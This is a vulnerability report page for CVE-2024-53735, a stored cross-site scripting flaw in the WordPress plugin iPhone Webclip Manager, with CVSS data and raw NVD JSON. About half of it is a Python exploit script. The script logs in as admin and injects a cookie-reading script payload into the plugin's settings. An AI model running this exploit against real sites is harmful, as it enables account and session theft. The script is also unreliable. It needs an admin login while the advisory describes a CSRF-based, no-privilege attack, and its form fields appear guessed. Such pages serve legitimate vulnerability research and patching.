Security Vulnerability Report
中文
CVE-2024-53735 CVSS 7.1 HIGH

CVE-2024-53735

Published: 2026-01-05 17:15:45
Last Modified: 2026-04-23 15:21:22

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in corourke iPhone Webclip Manager iphone-webclip-manager allows Stored XSS.This issue affects iPhone Webclip Manager: from n/a through <= 0.5.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

iPhone Webclip Manager <= 0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2024-53735 PoC - Stored XSS in WordPress iPhone Webclip Manager # Target: WordPress site with iPhone Webclip Manager plugin <= 0.5 target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-wordpress.local' # Malicious XSS payload xss_payload = '<script>alert(document.cookie)</script>' # WordPress admin credentials username = 'admin' password = 'password' def exploit_stored_xss(): """Exploit CVE-2024-53735 Stored XSS vulnerability""" session = requests.Session() # Step 1: Login to WordPress admin login_url = f'{target}/wp-login.php' login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In' } try: resp = session.post(login_url, data=login_data, timeout=10) if 'wordpress_logged_in' not in session.cookies.get_dict(): print('[-] Login failed') return False print('[+] Login successful') # Step 2: Inject XSS payload via plugin settings # Plugin admin page: /wp-admin/admin.php?page=iphone-webclip-manager admin_url = f'{target}/wp-admin/admin.php?page=iphone-webclip-manager' # XSS payload injection (stored in options) payload_data = { 'iphone_webclip_name': xss_payload, 'iphone_webclip_url': 'https://evil.example.com', 'submit': 'Save Changes' } resp = session.post(admin_url, data=payload_data, timeout=10) print('[+] XSS payload injected') print(f'[+] Payload: {xss_payload}') print('[+] Visit admin page to trigger XSS') return True except requests.RequestException as e: print(f'[-] Request error: {e}') return False if __name__ == '__main__': print(f'CVE-2024-53735 PoC - iPhone Webclip Manager Stored XSS') print(f'Target: {target}') exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-53735", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:44.590", "lastModified": "2026-04-23T15:21:21.920", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in corourke iPhone Webclip Manager iphone-webclip-manager allows Stored XSS.This issue affects iPhone Webclip Manager: from n/a through <= 0.5."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Corourke iPhone Webclip Manager permite XSS Almacenado. Este problema afecta a iPhone Webclip Manager: desde n/d hasta 0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/iphone-webclip-manager/vulnerability/wordpress-iphone-webclip-manager-plugin-0-5-csrf-to-stored-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}